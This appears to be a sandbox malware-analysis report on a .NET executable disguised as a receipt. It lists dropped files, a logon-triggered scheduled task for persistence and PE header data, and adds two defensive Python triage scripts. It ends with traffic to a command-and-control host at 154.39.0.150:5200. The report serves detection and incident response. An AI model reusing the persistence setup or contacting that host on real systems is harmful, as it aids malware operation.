                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1573
                                                                Entropy (8bit):5.111102349500528
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                MD5:66F999E47F117A71325CAC32D967885A
                                                                SHA1:A4A754EBEF3AA63B5BECF5104BB7F28387DF0E04
                                                                SHA-256:6724F469BCDA466ACE9FE74F5AFF9F38728585D0F9D4148E4BCEB78431870AE9
                                                                SHA-512:9140A09BAE1767BA053A9EBD3A32BE881AB8BD2CA56AFF7A99B52E280E0DDEFC8DAB8EED4A0185D20CDD46DD393E7B24504B7F7CA584A06F7398845290E0BBDE
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1573
                                                                Entropy (8bit):5.111102349500528
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                MD5:66F999E47F117A71325CAC32D967885A
                                                                SHA1:A4A754EBEF3AA63B5BECF5104BB7F28387DF0E04
                                                                SHA-256:6724F469BCDA466ACE9FE74F5AFF9F38728585D0F9D4148E4BCEB78431870AE9
                                                                SHA-512:9140A09BAE1767BA053A9EBD3A32BE881AB8BD2CA56AFF7A99B52E280E0DDEFC8DAB8EED4A0185D20CDD46DD393E7B24504B7F7CA584A06F7398845290E0BBDE
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 31 11:28:59 2024, mtime=Tue Dec 31 11:28:59 2024, atime=Tue Dec 31 11:28:59 2024, length=633344, window=hide
                                                                Category:dropped
                                                                Size (bytes):764
                                                                Entropy (8bit):5.049880310272238
                                                                Encrypted:false
                                                                SSDEEP:12:8wmK24ixyWCQddY//S7ALZ8h7xrZlajAs4UrHZ2lV7YEBmV:8jMixtr+67SCh75mAs4U1CVTBm
                                                                MD5:94EF75BC1DB938C7B506A9AA1C2C37CF
                                                                SHA1:F4F0C8A452D8E6A67FA4BDC35AE4060439538529
                                                                SHA-256:16C281BF4C406F4CF6DA4A871C4BD4F7118F38DFA066F56F8E6DBC1EEF3058C2
                                                                SHA-512:7371C59FEFC287570F973E218DE507C31501FA7B2BDECC7B9AEE19C6A5F3752959179D23645AFE56E49CD30DBF4C4D7CC31FB43051569BFCA485224828F7601B
                                                                Malicious:false
                                                                Preview:L..................F.... ....2...[...2...[...2...[..........................v.:..DG..Yr?.D..U..k0.&...&......vk.v....Y@...[.......[......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.c...........................%..A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......CW.^.Y.c...........................)..R.o.a.m.i.n.g.....b.2......Y.c .Notepab.exe.H......Y.c.Y.c..............................N.o.t.e.p.a.b...e.x.e.......Y...............-.......X............%.K.....C:\Users\user\AppData\Roaming\Notepab.exe........\.....\.....\.....\.....\.N.o.t.e.p.a.b...e.x.e.`.......X.......114127...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):633344
                                                                Entropy (8bit):7.394142091962777
                                                                Encrypted:false
                                                                SSDEEP:12288:wcMCwy9EXX+DE+c0bai72C/1Vlj/C/cyCoKaN:JwFOwV0LZd00oKQ
                                                                MD5:5322ECE916271AD6517A171BE2A5A378
                                                                SHA1:A6E2F7E14A60A184A58B37A6AA1593210EBFA6BD
                                                                SHA-256:4C839863452A16A4D99B13065CF93B09547D04B86BA649A8B40976122FF67A74
                                                                SHA-512:D8C2DDA33A96CF9DA9E2E976BA54C7F9CFB6FD2790827523CFC0092D34F27A600ACE4BA92064388203817F12A5387E2C1324860ECC0F1760429E3CE03DB92E87
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Awm...............0..f...B........... ........@.. ....................................@.....................................O........?...........................^..p............................................ ............... ..H............text...8e... ...f.................. ..`.rsrc....?.......@...h..............@..@.reloc..............................@..B.......................H............h......f...lA..X.............................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):633344
                                                                Entropy (8bit):7.394142091962777
                                                                Encrypted:false
                                                                SSDEEP:12288:wcMCwy9EXX+DE+c0bai72C/1Vlj/C/cyCoKaN:JwFOwV0LZd00oKQ
                                                                MD5:5322ECE916271AD6517A171BE2A5A378
                                                                SHA1:A6E2F7E14A60A184A58B37A6AA1593210EBFA6BD
                                                                SHA-256:4C839863452A16A4D99B13065CF93B09547D04B86BA649A8B40976122FF67A74
                                                                SHA-512:D8C2DDA33A96CF9DA9E2E976BA54C7F9CFB6FD2790827523CFC0092D34F27A600ACE4BA92064388203817F12A5387E2C1324860ECC0F1760429E3CE03DB92E87
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Awm...............0..f...B........... ........@.. ....................................@.....................................O........?...........................^..p............................................ ............... ..H............text...8e... ...f.................. ..`.rsrc....?.......@...h..............@..@.reloc..............................@..B.......................H............h......f...lA..X.............................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
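Both copies of the 1573-byte task XML among the dropped files above are the scheduled-task persistence artefact; the fields that matter for a hunt are the trigger type, the principal's RunLevel and the command the task runs. The Python below is an added example, not Joe Sandbox code and not the malware's: it parses a Task Scheduler XML file and flags an enabled LogonTrigger, a command under a user-writable directory, and a RegistrationInfo Date that predates the file by years. The sample task it parses is constructed from the elements visible in the preview; the preview is truncated before Actions, so the Actions block, including the XetHVID.exe command path, is an assumption, as are the USER_WRITABLE list, the age threshold and the function names.

```python
"""Example Task Scheduler XML triage (added here; not Joe Sandbox's or the sample's code).
SAMPLE_TASK is constructed from the report's preview; its <Actions> block is assumed."""
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Heuristic list (this example's assumption) of directories an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# A RegistrationInfo/Date this much older than the file suggests a copied template (heuristic).
TEMPLATE_AGE_DAYS = 365
# Analysis date of the report, used as the task file's observation time in the sample run.
SAMPLE_FILE_TIME = datetime(2024, 12, 31)

SAMPLE_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\XetHVID.exe</Command>
    </Exec>
  </Actions>
</Task>
"""
# Task files under %SystemRoot%\System32\Tasks are UTF-16 with a BOM, as the declaration says.
SAMPLE_TASK_BYTES = SAMPLE_TASK.encode("utf-16")


def _text(elem, path: str, default: str = "") -> str:
    found = elem.findtext(path, default=None, namespaces=NS)
    return (found if found is not None else default).strip()


def triage_task(data: bytes, file_time: datetime) -> dict:
    """Summarise one task file and list persistence findings.
    file_time is the task file's modification (or observation) time."""
    root = ET.fromstring(data)
    logon = root.find("t:Triggers/t:LogonTrigger", NS)
    # In the task schema a trigger without <Enabled> is enabled, hence the default "true".
    logon_on = logon is not None and _text(logon, "t:Enabled", "true").lower() != "false"
    commands = [(_text(e, "t:Command") + " " + _text(e, "t:Arguments")).strip()
                for e in root.findall("t:Actions/t:Exec", NS)]
    reg_date = _text(root, "t:RegistrationInfo/t:Date")
    findings = []
    if logon_on:
        findings.append("enabled LogonTrigger for %s" % _text(logon, "t:UserId", "(any user)"))
    for cmd in commands:
        if any(marker in cmd.lower() for marker in USER_WRITABLE):
            findings.append("command in user-writable path: %s" % cmd)
    if reg_date:
        # strptime on the first 19 characters tolerates the 7-digit fraction the schema uses
        registered = datetime.strptime(reg_date[:19], "%Y-%m-%dT%H:%M:%S")
        age = (file_time - registered).days
        if age > TEMPLATE_AGE_DAYS:
            findings.append("RegistrationInfo date %s is %d days older than the file"
                            % (reg_date[:10], age))
    return {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "logon_trigger": logon_on,
        "commands": commands,
        "findings": findings,
    }


if __name__ == "__main__":
    for finding in triage_task(SAMPLE_TASK_BYTES, SAMPLE_FILE_TIME)["findings"]:
        print(finding)
```

On a live host or a mounted image the same function runs over every file under C:\Windows\System32\Tasks. The task in the report runs as the interactive user with RunLevel LeastPrivilege, so what it persists is a user-level implant; the dropped shortcut pointing at C:\Users\user\AppData\Roaming\Notepab.exe is a second, independent hook and should be hunted separately.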
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.394142091962777
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:Receipt-#202431029B.exe
                                                                File size:633'344 bytes
                                                                MD5:5322ece916271ad6517a171be2a5a378
                                                                SHA1:a6e2f7e14a60a184a58b37a6aa1593210ebfa6bd
                                                                SHA256:4c839863452a16a4d99b13065cf93b09547d04b86ba649a8b40976122ff67a74
                                                                SHA512:d8c2dda33a96cf9da9e2e976ba54c7f9cfb6fd2790827523cfc0092d34f27a600ace4ba92064388203817f12a5387e2c1324860ecc0f1760429e3ce03db92e87
                                                                SSDEEP:12288:wcMCwy9EXX+DE+c0bai72C/1Vlj/C/cyCoKaN:JwFOwV0LZd00oKQ
                                                                TLSH:97D4CF14776DCB06D53947F00A60E6B8137A7D8EB812E20F6ED97EEF3872B055A10683
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Awm...............0..f...B........... ........@.. ....................................@................................
                                                                Icon Hash:32789ab39292d290
                                                                Entrypoint:0x498512
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0xF56D7741 [Fri Jun 25 07:31:13 2100 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                push ebx
                                                                add byte ptr [ecx+00h], bh
                                                                jnc 00007F6B90522BF2h
                                                                je 00007F6B90522BF2h
                                                                add byte ptr [ebp+00h], ch
                                                                add byte ptr [ecx+00h], al
                                                                arpl word ptr [eax], ax
                                                                je 00007F6B90522BF2h
                                                                imul eax, dword ptr [eax], 00610076h
                                                                je 00007F6B90522BF2h
                                                                outsd
                                                                add byte ptr [edx+00h], dh
add byte ptr [eax], al   (repeated 81 times in the original listing: the bytes after the stub are zero padding, which the disassembler renders as this instruction)
Only the first instruction, jmp dword ptr [00402000h], is real code. With the Imagebase of 0x400000 it jumps through the single IAT slot at RVA 0x2000 (IMAGE_DIRECTORY_ENTRY_IAT, size 0x8) to the binary's one import, mscoree.dll!_CorExeMain, which is the standard native entry stub of a managed executable; everything between that jmp and the zero padding is the disassembler reading non-code bytes, not a meaningful code path.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x984bd | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9a000 | 0x3f1c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x95ec4 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x96538 | 0x96600 | e4397bd152d995027866c7a523c77052 | False | 0.7672128273067331 | data | 7.383968480412204 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9a000 | 0x3f1c | 0x4000 | 0405fcb392404cbbd62988ecfe5ea3f9 | False | 0.92718505859375 | data | 7.810402814436972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9e000 | 0xc | 0x200 | 0740c0265c3a7cf79363818b87a56cd8 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x9a130 | 0x38ae | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9891109579600276
RT_GROUP_ICON | 0x9d9e0 | 0x14 | data | | | 0.95
RT_VERSION | 0x9d9f4 | 0x33c | data | | | 0.4323671497584541
RT_MANIFEST | 0x9dd30 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
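The static PE fields above (the TimeDateStamp 0xF56D7741 that decodes to the year 2100, the per-section Entropy column, the single mscoree.dll import) are what a first-pass triage script checks before any dynamic run. The following Python is an added example, not Joe Sandbox code and not taken from the sample: a hand-rolled header walker that decodes the compile timestamp, flags one that lies after the observation time, and scores each section's raw bytes by Shannon entropy. The PE32 skeleton it builds as input is constructed for the example (the report's timestamp, a pseudo-random .text, a near-empty .reloc); its optional header is zero-filled, so it is not a loadable binary. The function names and the 7.0 entropy threshold are the example's own choices.

```python
"""Example PE triage (added here; not Joe Sandbox's code and not from the sample).
Walks the headers by hand, decodes TimeDateStamp and scores section entropy.
build_sample_image() constructs a minimal PE32 skeleton for input."""
import hashlib
import math
import struct
from datetime import datetime, timedelta, timezone

UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0 .. 8.0; the same measure as the section table's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def decode_timestamp(ts: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since 1970-01-01 UTC. Adding a
    timedelta instead of calling fromtimestamp() avoids platform limits on large
    values such as 0xF56D7741 (year 2100)."""
    return UNIX_EPOCH + timedelta(seconds=ts)


def parse_pe(image: bytes) -> dict:
    """Return machine, TimeDateStamp and per-section name/RVA/raw size/entropy."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER (20 bytes after "PE\0\0"): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    sec_table = e_lfanew + 24 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsec):
        off = sec_table + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "vaddr": vaddr, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw)})
    return {"machine": machine, "timestamp": ts, "sections": sections}


def triage(image: bytes, observed_at: datetime, entropy_threshold: float = 7.0) -> list:
    """Findings as strings: a build time after observation, and sections that look packed.
    The threshold is this example's choice, not a Joe Sandbox setting."""
    info = parse_pe(image)
    findings = []
    built = decode_timestamp(info["timestamp"])
    if built > observed_at:
        findings.append("timestamp 0x%08X decodes to %s UTC, after the observation time"
                        % (info["timestamp"], built.strftime("%Y-%m-%d %H:%M:%S")))
    for s in info["sections"]:
        # skip tiny sections: a 12-byte .reloc cannot have a meaningful entropy
        if s["raw_size"] >= 0x200 and s["entropy"] >= entropy_threshold:
            findings.append("section %s entropy %.2f >= %.1f: packed or encrypted content likely"
                            % (s["name"], s["entropy"], entropy_threshold))
    return findings


def build_sample_image() -> bytes:
    """Constructed input: DOS header, PE32 file header with the report's TimeDateStamp,
    a zero-filled optional header, a high-entropy .text and a near-empty .reloc."""
    e_lfanew, opt_size, data_start = 0x80, 0xE0, 0x400
    text = b"".join(hashlib.sha256(b"sample-%d" % i).digest() for i in range(128))  # 4096 bytes
    reloc = b"\x00\x20\x00\x00\x0c\x00\x00\x00" + b"\x00" * 504                    # 512 bytes
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    file_hdr = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0xF56D7741, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)      # PE32 magic, rest zero
    sec_text = (b".text".ljust(8, b"\0")
                + struct.pack("<IIII", len(text), 0x2000, len(text), data_start) + b"\x00" * 16)
    sec_reloc = (b".reloc".ljust(8, b"\0")
                 + struct.pack("<IIII", 0xC, 0x9E000, len(reloc), data_start + len(text)) + b"\x00" * 16)
    header = (dos + file_hdr + opt_hdr + sec_text + sec_reloc).ljust(data_start, b"\0")
    return header + text + reloc


if __name__ == "__main__":
    for line in triage(build_sample_image(), datetime(2024, 12, 31, tzinfo=timezone.utc)):
        print(line)
```

Run against the real file, the same walker reproduces the table's .text entropy of 7.38. Ordinary managed code and metadata usually land well below 7, so a value that high in a 600 KB .NET assembly, together with the "Sample uses string decryption" signature, points to an encrypted or packed payload carried inside the section rather than plain IL.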
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 13:29:04.024653912 CET | 49735 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:04.029825926 CET | 5200 | 49735 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:04.029891014 CET | 49735 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:04.353319883 CET | 49735 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:04.358198881 CET | 5200 | 49735 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:05.422609091 CET | 5200 | 49735 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:05.422708988 CET | 49735 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:08.673486948 CET | 49735 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:08.674637079 CET | 49736 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:08.678359032 CET | 5200 | 49735 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:08.679517984 CET | 5200 | 49736 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:08.679596901 CET | 49736 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:08.698333979 CET | 49736 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:08.703104973 CET | 5200 | 49736 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:10.145076036 CET | 5200 | 49736 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:10.145176888 CET | 49736 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:14.032434940 CET | 49736 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:14.033340931 CET | 49742 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:14.037600994 CET | 5200 | 49736 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:14.038173914 CET | 5200 | 49742 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:14.042087078 CET | 49742 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:14.062819958 CET | 49742 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:14.067616940 CET | 5200 | 49742 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:15.459269047 CET | 5200 | 49742 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:15.459331036 CET | 49742 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:17.938867092 CET | 49742 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:17.939575911 CET | 49744 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:17.943741083 CET | 5200 | 49742 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:17.944394112 CET | 5200 | 49744 | 154.39.0.150 | 192.168.2.4
Dec 31, 2024 13:29:17.944463015 CET | 49744 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:17.963808060 CET | 49744 | 5200 | 192.168.2.4 | 154.39.0.150
Dec 31, 2024 13:29:17.968734026 CET | 5200 | 49744 | 154.39.0.150 | 192.168.2.4
                                                                Dec 31, 2024 13:29:19.346200943 CET520049744154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:19.346263885 CET497445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:21.220103025 CET497445200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:21.220942974 CET497455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:21.224960089 CET520049744154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:21.225799084 CET520049745154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:21.225888968 CET497455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:21.244355917 CET497455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:21.249191046 CET520049745154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:22.610204935 CET520049745154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:22.610495090 CET497455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:24.829576969 CET497455200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:24.830559015 CET497465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:24.834481001 CET520049745154.39.0.150192.168.2.4
